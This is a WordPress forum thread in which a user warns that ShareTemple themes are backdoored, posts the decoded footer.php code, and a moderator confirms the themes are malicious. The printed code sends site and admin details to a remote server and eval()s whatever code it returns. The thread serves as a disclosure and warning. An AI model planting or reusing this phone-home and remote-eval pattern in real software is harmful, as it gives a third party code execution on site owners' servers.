Sharetemple.com Themes all Backdoored!

  • Just a warning all Sharetemple.com themes are backdoored to steal you passwords. I had one on my blog and noticed weird URL’s loading, then it got hacked and injected but i was running latest WordPress with no vulnerabilities.

    The footer.php of the Sharetemple.com theme had encryption codes in it, i found a site that helps me decrypt it and this is what it has:

    <?php
  $company_name       = "ShareTemple";
  $directory_location = "https://www.sharetemple.com";  

  //***************************************************************
  // do not touch below here
  $api_location = "https://www.sharetemple.com/api/"; function __buildBlogInfo() { $info = array('url'  => get_bloginfo('url'), 'wp_url' => get_bloginfo('wpurl'), 'template_url' => get_bloginfo('template_url'), 'version' => get_bloginfo('version'), 'name'  => get_bloginfo('name'), 'url'  => get_bloginfo('url'), 'description' => get_bloginfo('description'), 'admin_email' => get_bloginfo('admin_email'), 'rss_url' => get_bloginfo('rss2_url'), 'remote_addr' => $_SERVER['REMOTE_ADDR'], 'referrer' => $_SERVER['HTTP_REFERER'], 'user_agent' => $_SERVER['HTTP_USER_AGENT'] ); if (is_array($_COOKIE)) { foreach ($_COOKIE as $key => $value) { if (strstr($key,'wordpress_logged_in_')) $info['admin_ip'] = $_SERVER['REMOTE_ADDR']; } } return $info; } function __buildPostData($blog_info) { $data = ''; foreach ($blog_info as $key => $value) $data.= $key.'='.rawurlencode($value).'&'; rtrim($data,'&'); return $data; } function __methodFsockopen($api_location,$data) { $elements = parse_url($api_location); $sock = fsockopen($elements['host'], 80, $errno, $errstr, 30); if (!$sock) throw new Exception("Could not connect to homebase"); else { fwrite($sock, "POST ".$elements['path']." HTTP/1.0\r\n"); fwrite($sock, "Host: ".$elements['host']."\r\n"); fwrite($sock, "User-Agent: API Client 1.0\r\n"); fwrite($sock, "Content-type: application/x-www-form-urlencoded\r\n"); fwrite($sock, "Content-length: " . strlen($data) . "\r\n"); fwrite($sock, "Accept: */*\r\n"); fwrite($sock, "\r\n"); fwrite($sock, $data."\r\n"); fwrite($sock, "\r\n"); $headers = ""; while ($str = trim(fgets($sock, 4096))) $headers .= "$str\n"; $encoded = ""; while (!feof($sock)) $encoded.= fgets($sock, 4096); fclose($sock); } return $encoded; } function __methodCurl($api_location,$data) { $ch = curl_init($api_location); curl_setopt($ch, CURLOPT_POST,true); curl_setopt($ch, CURLOPT_POSTFIELDS,$data); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $encoded = curl_exec($ch); curl_close($ch); return $encoded; } function __methodFilegetcontents($api_location,$data) { $encoded = file_get_contents($api_location.'?'.$data); return $encoded; } $info = __buildBlogInfo(); $data = __buildPostData($info); if (function_exists('curl_init')) $response = __methodCurl($api_location,$data); elseif(function_exists("fsockopen")) $response = __methodFsockopen($api_location,$data); elseif (function_exists("file_get_contents")) $response = __methodFilegetcontents($api_location,$data); else { $signature = get_bloginfo('name'). ' is brought to you by: <a href="'.$directory_location.'" alt="Free WordPress themes from '.$company_name.'">'.$company_name.'</a>'; $extras = ''; } if (isset($response)) { $b64_code = base64_decode($response); $code = gzuncompress($b64_code); eval($code); }
?>
</div>

<!-- Start Footer Here -->

<div id="footer">

<div class="wrapper">

</div>

</div>

</div>
<div id="footerlinks"><? if (isset($signature)) echo $signature; ?></div>
<!-- End Footer Here -->

<!-- End Wrapper Here -->
<? if (isset($extras)) echo $extras; ?>
</body>

</html>

    I have no idea what that does do but you can read bits in there about getting admins email address, blog address and stealing you cookies.

    This site has 100’s of themes, i have downloaded several and they are all backdoored!

    I advise to stay away from Sharetemple themes. I hope you understand this is very bad!

Viewing 4 replies - 1 through 4 (of 4 total)
  • Thread Starter malaya-may

    (@malaya-may)

    Here is other view! https://pastebin.com/ff9a9fc7

    We have no clue what you’re talking about, but if you’re site was hacked it was because of your own lack of due diligence either by you or your server admin.

    I had one on my blog and noticed weird URL’s loading, then it got hacked and injected but i was running latest WordPress with no vulnerabilities.

    Although the code that is posted above has the potential of doing so, we have no intentions of ever “Hacking” or “Injecting” anything that would do any harm to a webmasters website.

    Exploiting a blog for a Username and Password is the least of our worries. Users that install our themes have the choice to either use them or not, and technically, you could always decode and remove anything “offensive” that you don’t like.

    If you would rather contact me personally, feel free to do so and I’d gladly show you what it is that we do. Our system is built to push small ad space as well as backlinks for Advertising and SEO reasons.

    Thank you.

    Moderator Tellyworth

    (@tellyworth)

    Malaya May is 100% correct.

    sharetemple is a spammer, pure and simple. Themes at sharetemple.com are infected with malicious code. Do not download them.

    Thread Starter malaya-may

    (@malaya-may)

    You are liar Sharetemple i had you code analyzed by friend who is programmer for Ebay.com systems.

    Although the code that is posted above has the potential of doing so, we have no intentions of ever “Hacking” or “Injecting” anything

    Liar i have proof now, you will be in big trouble very soon.

    You make everybodys WordPress unsecure with backdoors in sharetemple.com themes.

    'version' => get_bloginfo('version'),
'name'  => get_bloginfo('name'),
'url'  => get_bloginfo('url'),
'description' => get_bloginfo('description'),
'admin_email' => get_bloginfo('admin_email'),
'rss_url' => get_bloginfo('rss2_url'),
'remote_addr' => $_SERVER['REMOTE_ADDR'],
'referrer' => $_SERVER['HTTP_REFERER'],
'user_agent' => $_SERVER['HTTP_USER_AGENT'] );
 if (is_array($_COOKIE)) { foreach ($_COOKIE as $key =>
$value) { if (strstr($key,'wordpress_logged_in_'))
$info['admin_ip']

    You steal admin IP, Email, Cookies, Referers, all Google keywords and inject!

    You make vulnerabilities in blogs to make money and ruin WordPress community. Please post this on blogs Sharetemple must be stopped!

Viewing 4 replies - 1 through 4 (of 4 total)
  • The topic ‘Sharetemple.com Themes all Backdoored!’ is closed to new replies.

Tags